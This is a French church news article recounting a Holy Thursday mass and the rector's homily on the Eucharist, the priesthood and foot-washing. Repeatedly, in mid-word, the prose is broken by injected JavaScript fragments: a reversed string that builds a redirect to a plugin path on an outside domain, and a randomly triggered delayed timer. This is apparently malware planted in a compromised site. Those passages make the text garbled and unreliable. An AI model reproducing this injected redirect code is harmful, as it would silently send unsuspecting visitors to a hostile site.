La célébration Eucharistique de jeudi saint a été présidée par le Recteur du Sanctuaire de la paix et la Réconciliation, Père Herménégilde COYITUNGIYE, laChorale Sancta Maria a entonné les chants liturgiques. Les Saintes écritures étaient tirées successivement du livre du prophète Isaïe (Is 61, 1-3a.6a.8b-9), de l’Apocalypse de saint Jean (Ap 1, 5-8) et de l’Évangile de Jésus Christ selon saint Luc (Lc 4, 16-21).

Nous sommes en train de célébrer le jeudi saint, le jour où Jésus Christ a instauré le sacrement sacertoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dotal. Jeudi saint, c’est une bonne occasion de bien contempler DIEU en l’amour de Jésus Christ qui s’est toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné corp et âme pour nous libérer des péchés, a laissé entendre le Recteur du Sanctuaire, Père Herménégilde COYITUNGIYE, dans son introduction.

Chers biens aimés en Christ, le jeudi saint nous rappelle premièrement le Saint Sacrement que Dieu a fait étant au milieu des apôtres ainsi que le Sacrement de la fraternité, car ces deux Sacrements vont de pair. Les saints apôtres Mathieu, Marc et Luc nous les montrent à travers les paroles prononcées en commençant le Saint Sacrement. Aujourd’hui, saint Paul apôtre l’a rappelé lui aussi, mais c’est saint Jean apôtre qui nous a montré ce grand signe d’amour que Jésus manifeste envers son peuple qu’il aime tant. Le fait de laver les pieds de ses apôtres pour leur montrer combien il les aime ce qui les a même étonné d’avoir fait ce signe d’amour envers eux malgré leur état de pécheurs en entendant les mots d’étonnement prononcés par Saint Pierre apôtre.

Jésus s’est toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné corps et âme pour que nous ayons la vie éternelle en mangeant sa chair, en buvant son sang comme signe d’amour envers nous tous les croyants. Le pain et le vin se sont transformé en chair et le sang de Jésus Christ comme un signe pour nous qui montre que notre vie devra être transformé en une vie fraternelle des gens qui partagent le pain et le vin du Christ. En d’autres termes, nous partageons le Saint Sacrement de temps en temps, mais nous ignorons de garder dans notre cœur cette image de la fraternité, de l’unité envers notre prochain. Pour que nous ayons l’idée de rassemblement dans l’unité parfaite des enfants de Dieu, nous devons garder ce bon exemple de Jésus Christ de laver les pieds de nos voisins. Si nous pratiquons cet exemple de bonne foi, il n’y aura pas de jalousie entre les gens et même la tuerie. Pour bien mener une vie Pascale, nous devrons comprendre et suivre la parole prononcé par Jésus aux Apôtres : «Vous m’appelez Seigneur, Maître et je le suis ,vous devez vous aussi vous laver les pieds come je vous montre l’exemple ». Par cet exemple, Père Herménégilde qui présidait la messe a recommandé aux hommes présents dans ladite messe de laver les pieds de leurs femmes une fois arrivés à la maison comme signe d’amour envers elles.

En deuxième position au Sacrement Sacertoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dotal fondé sur cette parole : « Vous le ferez en mémoire de moi ».

Qu’est-ce qu’ils vont faire en sa mémoire ? C’est d’abord ce signe de se laver les pieds les uns les autres en signe d’amour qui se manifeste entre les gens qui vivent la fraternité, ensuite c’est le fait de célébrer l’Eucharistie et les autres cérémonies qui vont de pair avec ce Sacrement. Les prêtres à leur tour sont des envoyés de Jésus Christ dans sa place afin qu’ils puissent continuer son signe d’amour de Dieu envers tous les croyants en lavant les jambes de tous les enfants de Dieu. Ils sont dans la mission de partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner tous les péchés de tous les fidèles de l’Eglise. Ils ne sont pas de simples gens, ils sont des intermédiaires entre Dieu et les hommes.

Pour Saint Jean Marie Vianney qui a médité beaucoup su ce mystère Sacertoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dotal, il disait ceci : «Le prêtre est l’instrument que Dieu utilise pour partager la Parole de Dieu avec les autres ; le prêtre est celui que Dieu utilise pour libérer les gens de leur péché; le prêtre est celui que Dieu utilise pour ouvrir les portes des royaumes de Dieu, le prêtre est le Ministre des finances du Royaume de Dieu; le prêtre est le chemin que Dieu utilise pour toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner les bénédictions envers ses enfants ;le prêtre est l’Econome du Salut»

Le prêtre ne vit pas pour son propre intérêt, il nous appartient nous tous, nous devons l’encourager dans ses missions, il faut aimer nos prêtres et prier pour eux afin qu’ils accomplissent leurs missions dans la paix.

En troisième position, ça nous renseigne la liberté de Jésus Christ. Jésus s’est toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné corps et âme sur la Croix pour que nous puissions être sauvés de tous nos péchés. Le fait que Jésus a accepté de mourir c’est par amour, ce ne pas à dire qu’il encourage la mort, il voulait être en face des hommes innocents qui meurt de temps en temps d’une façon injuste, ceux qui meurt sans passer devant la cour de justice. Il a accepté la mort sur la croix pour que la volonté de Dieu s’accomplisse. Quant à lui, il voulait montrer aux autres qu’il faut suivre la justice devant tous les gens. L’amour, la paix, la justice se manifestent même dans le signe qu’il fait d’enlever son vêtement en lavant les pieds des apôtres pour nous rappeler que c’est lui le chemin, la vie et la vérité. Ce signe montre que Jésus est responsable de sa vie, il la toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne volontiers et la récupère comme il veut sans problème. Cet amour de Jésus nous fait recourir à la Vierge Marie car là où se trouve Jésus même la Vierge Marie est présente. Celui qui veut voir Jésus devra voir aussi la Vierge Marie sa mère pour vivre cet amour de Dieu, a conclu le Père Recteur.

NIMBONA Frédéric